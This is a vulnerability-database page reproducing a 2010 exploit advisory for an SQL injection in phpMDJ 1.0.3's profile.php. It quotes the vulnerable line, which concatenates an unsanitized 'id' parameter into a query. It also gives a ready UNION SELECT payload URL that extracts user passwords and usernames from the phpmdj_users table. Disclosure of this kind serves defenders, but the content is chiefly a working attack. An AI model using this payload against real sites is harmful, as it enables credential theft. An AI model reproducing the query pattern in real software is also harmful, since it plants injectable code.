Lucene search

K

phpMDJ 1.0.3 SQL Injection Vulnerability

🗓️ 10 Jan 2010 00:00:00Reported by k4cp3rType 
zdt
 zdt
🔗 0day.today👁 14 Views

phpMDJ 1.0.3 SQL Injection Vulnerability in profile.ph

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
========================================
phpMDJ 1.0.3 SQL Injection Vulnerability
========================================

,--------------------------------------------------------------,
> Vulnerable Script : phpMDJ 1.0.3                             \
> Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip  \
> Vulnerability : Remote Sql Injection                         \
'--------------------------------------------------------------'
 
,-------------------------------------------------------------------------------------------------------------------------------------,
> Profile.php                                                                  \
> Line 14 : $membre = $_GET['id'];                                                     \
> Line 15 :                                                                \
> Line 16 : $sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre"; \
>                                                                      \
> Injection:                                                               \
> http://site/path/profile.php?id=[SQL]                                                    \
>                                                                      \
> Example:                                                                 \
> http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--         \
'-------------------------------------------------------------------------------------------------------------------------------------'



#  0day.today [2018-01-03]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1
14
.json
Report